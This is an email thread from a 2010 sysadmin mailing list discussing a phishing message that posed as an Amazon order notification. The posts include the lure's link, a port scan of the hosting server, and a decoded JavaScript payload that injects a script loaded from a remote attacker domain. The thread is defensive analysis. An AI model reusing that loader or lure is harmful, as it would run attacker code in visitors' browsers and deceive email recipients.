RE: Order Notify #401186

[Clark, Tommy R]

If he were fresh from a CISSP exam, he would have decoded the payload in
walford.html as the following JavaScript.

 

function ljs(){try{var
s=document.createElement("script");s.setAttribute("src","http://saeghieb
eesiogoh.in:3129/js");document.body.appendChild(s)}catch(e){}}setTimeout
("ljs()",500);

 

Unfortunately, I was not able to get http://saeghiebeesiogoh.in:3129/js
to see what the true intentions were.

 

From: bounce-8830234-8239...@lyris.sunbelt-software.com
[mailto:bounce-8830234-8239...@lyris.sunbelt-software.com] On Behalf Of
James Rankin
Sent: Tuesday, February 23, 2010 11:45 AM
To: NT System Admin Issues
Subject: Re: Order Notify #401186

 

Now there's a guy who's obviously just fresh from a CISSP exam :-)

On 23 February 2010 16:36, Ziots, Edward <ezi...@lifespan.org> wrote:

http://80.109.240.71/~e.loesberg/walford.html
<http://80.109.240.71/%7Ee.loesberg/walford.html> 

 

Is the link inside the email. It's defintely a phishing attack. Single
box system behind a firewall (2 hops from source)

 

Name:    members.chello.nl

Address:  80.109.240.71

(its in Vienna Austria)

 

PORT   STATE SERVICE REASON  VERSION

21/tcp open  ftp     syn-ack ProFTPD 1.2.10

80/tcp open  http    syn-ack Apache httpd

 

Like they say, never click the link. And don't answer the email, it lets
them know you are there.. and they will just keep spamming you...

 

Z

 

From: Sherry Abercrombie [mailto:saber...@gmail.com] 
Sent: Tuesday, February 23, 2010 10:37 AM


To: NT System Admin Issues

Subject: Re: Order Notify #401186

 

GMail is good.  Marked this one as spam and sent to my spam folder, with
a nice little warning that it might not be from who it says and to be
careful, etc etc.  

On Tue, Feb 23, 2010 at 9:34 AM, James Rankin <kz2...@googlemail.com>
wrote:

Oooohhh....I must click on the link, seeing as though it has some funky
numbers instead of letters. Looks decidedly unsuspicious

On 23 February 2010 15:29, Carol Fee <c...@massbar.org> wrote:

What the hec k ??????

 

CFee

From: Customer Support [mailto:silvia.coll...@customer.amazon.com] 
Sent: Monday, February 22, 2010 6:55 PM
To: NT System Admin Issues
Subject: Order Notify #401186

 


Your Order id:822324764225
Info <http://80.109.240.71/%7Ee.loesberg/walford.html> 

Thank you.
Amazon.com Support 

 

 

 

 




-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put
into the machine wrong figures, will the right answers come out?' I am
not able rightly to apprehend the kind of confusion of ideas that could
provoke such a question."

 

 






-- 
Sherry Abercrombie

"Any sufficiently advanced technology is indistinguishable from magic." 
Arthur C. Clarke

 

 

 

 




-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put
into the machine wrong figures, will the right answers come out?' I am
not able rightly to apprehend the kind of confusion of ideas that could
provoke such a question."

 

 

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~ <http://www.sunbeltsoftware.com/Business/VIPRE-Enterprise/>  ~